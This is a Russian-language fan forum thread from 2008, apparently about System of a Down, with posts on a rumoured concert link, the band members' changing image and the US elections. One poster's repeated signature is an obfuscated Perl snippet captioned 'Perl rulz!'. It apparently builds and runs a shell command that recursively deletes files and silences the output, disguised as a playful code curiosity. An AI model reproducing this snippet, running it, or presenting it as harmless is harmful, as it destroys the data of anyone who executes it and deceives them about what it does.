Добавлено: Чт Фев 14, 2008 12:03 am Заголовок сообщения:
над посмотреть))) я не видел раньше) у меня есть он, могу кинуть образ _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Вс Фев 17, 2008 1:52 am Заголовок сообщения:
THORON
это СЛУХИ, пока инфа не подтвердиться прошу больш нигде не свети _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Фев 17, 2008 2:02 am Заголовок сообщения:
это тот же сайт что в прошлом году всех развел концертом слипов
ты как хочешь, я бы ссылку удалил, оставляю решение тебе ничо править не стану _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
у меня ссылка не работает,а вообще какая разница отстриг или нет,главное чтоб музыку хорошую и дальше делал) _________________ "We accept her! We accept her! One of us! One of us! Gooble gobble, gooble gobble!"
Про предстоящие выборы в Америке и то что он нифига не верит в их честность а в то что всех купили. _________________ And if I die before i wake... LET THE MOTHERSHIP LAND MY SOUL TO TAKE!
Да и вообще ет его дело. Никакой нормальный человек не проходит 10 лет с одним и темже прикидом...... _________________ And if I die before i wake... LET THE MOTHERSHIP LAND MY SOUL TO TAKE!
Да и вообще ет его дело. Никакой нормальный человек не проходит 10 лет с одним и темже прикидом......
Серж не раз менял имидж. По-моему само неудачно сменил имидж мр. Малакян... Особенно ужасен он щас((( Его имидж 2001 года остается, имхо, лучшим на данный момент.
Хотя их вид - это далеко не главное. Главное конечно же мьюзик))
Серж не раз менял имидж. По-моему само неудачно сменил имидж мр. Малакян... Особенно ужасен он щас((( Его имидж 2001 года остается, имхо, лучшим на данный момент.
Хотя их вид - это далеко не главное. Главное конечно же мьюзик))
Ну я и не говорю что один раз....просто ето тоже люди и имидж ето понятие относительное.....значит ето ему нравится и его ничем не переубедиш. _________________ And if I die before i wake... LET THE MOTHERSHIP LAND MY SOUL TO TAKE!